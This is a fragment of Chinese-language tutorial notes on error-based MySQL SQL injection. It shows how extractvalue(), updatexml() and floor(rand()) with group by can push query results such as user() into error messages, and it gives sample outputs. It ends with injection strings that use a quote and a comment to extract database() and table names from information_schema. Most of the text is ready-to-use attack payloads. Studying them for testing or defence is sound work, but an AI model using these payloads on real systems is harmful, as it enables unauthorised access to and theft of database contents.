|
|
- 2、extractvalue(arg1,arg2) :从目标XML中返回包含所查询值的字符串,arg1为是String格式,为XML文档对象的名称。arg2为Xpath格式的字符串。
|
- 语句:select extractvalue(1,concat(0x7e,(select user()),0x7e))
- 返回结果:XPATH syntax error: '~root@localhost~
|
- 3、updatexml(arg1,arg2,arg3):改变文档中符合条件的节点的值,arg1位xml文档对象的名称,arg2为xpath格式的字符串,arg3,String格式,替换查找到的符合条件的数据。
|
- 语句:select updatexml(1,concat(0x7e,(select user()),0x7e),1)
- 返回结果:XPATH syntax error: '~root@localhost~
|
- 4、floor(arg1):函数只返回arg1整数部分,小数部分舍弃。
|
- 语句:select 1,(select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a),3
- 返回结果:Duplicate entry 'root@localhost1' for key 'group_key’
|
- 5、Extractvalue() updatexml()
|
|
|
- 1' and extractvalue(1,concat(0x7e,(select database()),0x7e))#
|
|
- 1' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e))#
|